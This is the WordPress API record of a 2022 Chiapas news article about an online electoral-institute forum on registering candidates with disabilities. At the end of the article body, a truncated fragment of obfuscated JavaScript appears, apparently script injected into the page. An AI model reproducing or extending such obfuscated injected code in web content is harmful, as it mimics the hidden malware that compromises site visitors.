{"id":3716,"date":"2022-07-19T02:16:27","date_gmt":"2022-07-19T02:16:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3716"},"modified":"2022-07-19T02:16:28","modified_gmt":"2022-07-19T02:16:28","slug":"celebraran-en-san-cristobal-el-foro-inclusion-de-personas-con-discapacidad-en-el-registro-de-candidaturas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3716","title":{"rendered":"Celebrar\u00e1n en San Crist\u00f3bal el foro: &#8220;Inclusi\u00f3n de Personas con Discapacidad en el Registro de Candidaturas&#8221;"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"706\" height=\"727\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0038.jpg\" alt=\"\" class=\"wp-image-3719\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0038.jpg 706w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0038-291x300.jpg 291w\" sizes=\"auto, (max-width: 706px) 100vw, 706px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>18 de julio del 2022. San Crist\u00f3bal de Las Casas.- La Consejera Electoral del Instituto de Elecciones y Participaci\u00f3n Ciudadana (IEPC) en Chiapas, Helena Margarita Jim\u00e9nez Paniagua, anunci\u00f3 que este martes se llevar\u00e1 a cabo el Foro: &#8221; Inclusi\u00f3n de Personas con Discapacidad en el Registro de Candidaturas &#8220;, con la finalidad de promover sus derechos pol\u00edticos y puedan ser consideradas para su registro en una contienda a un cargo p\u00fablico.<\/p>\n\n\n\n<p>\u201cEl foro esta denominado inclusi\u00f3n de Personas con Discapacidad en el Registro de Candidaturas y se va realzar en l\u00ednea el d\u00eda martes 19 de julio a las 12 horas. Una de las actividades de los institutos electorales es tambi\u00e9n promover la participaci\u00f3n ciudadana sin distinci\u00f3n alguna, y espec\u00edficamente en este caso, estamos hablando de un sector de la poblaci\u00f3n que se encuentra considerado de atenci\u00f3n prioritaria\u201d, dijo.<\/p>\n\n\n\n<p>En entrevista, explic\u00f3 que desde los derechos humanos, que deja en claro que todos tienen la libertad de participar, es la visi\u00f3n de este foro, donde las personas con alguna discapacidad deben conocer que derechos electorales tiene, c\u00f3mo registrarse para participar en alguna contienda electoral.<\/p>\n\n\n\n<p>\u201chay dos antecedentes, en el estado de Zacatecas, a una persona que se le neg\u00f3 una candidatura por tener una discapacidad y en Hidalgo por una omisi\u00f3n legislativa del congreso de ese estado, y esos dos precedentes han servido para que la sala superior determine diferentes medidas como estas acciones que buscan que estas personas puedan ejercer sus derechos\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Jim\u00e9nez Paniagua, destac\u00f3 que ser\u00e1n expertas en este sentido quienes impartir\u00e1n el tema, y la poblaci\u00f3n logre tener una contacto m\u00e1s directo, y puedan fortalecer dudas o temas que consideren necesarios en las jornadas electorales venideras.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 18 de julio del 2022. San Crist\u00f3bal de Las Casas.- La Consejera Electoral del Instituto de Elecciones y Participaci\u00f3n Ciudadana (IEPC) en Chiapas, Helena Margarita Jim\u00e9nez Paniagua, anunci\u00f3 que este martes se llevar\u00e1 a cabo el Foro: &#8221; Inclusi\u00f3n de Personas con Discapacidad en el Registro de Candidaturas &#8220;, con la finalidad de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3719,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3716","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3716","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3716"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3716\/revisions"}],"predecessor-version":[{"id":3722,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3716\/revisions\/3722"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3719"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3716"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3716"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3716"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}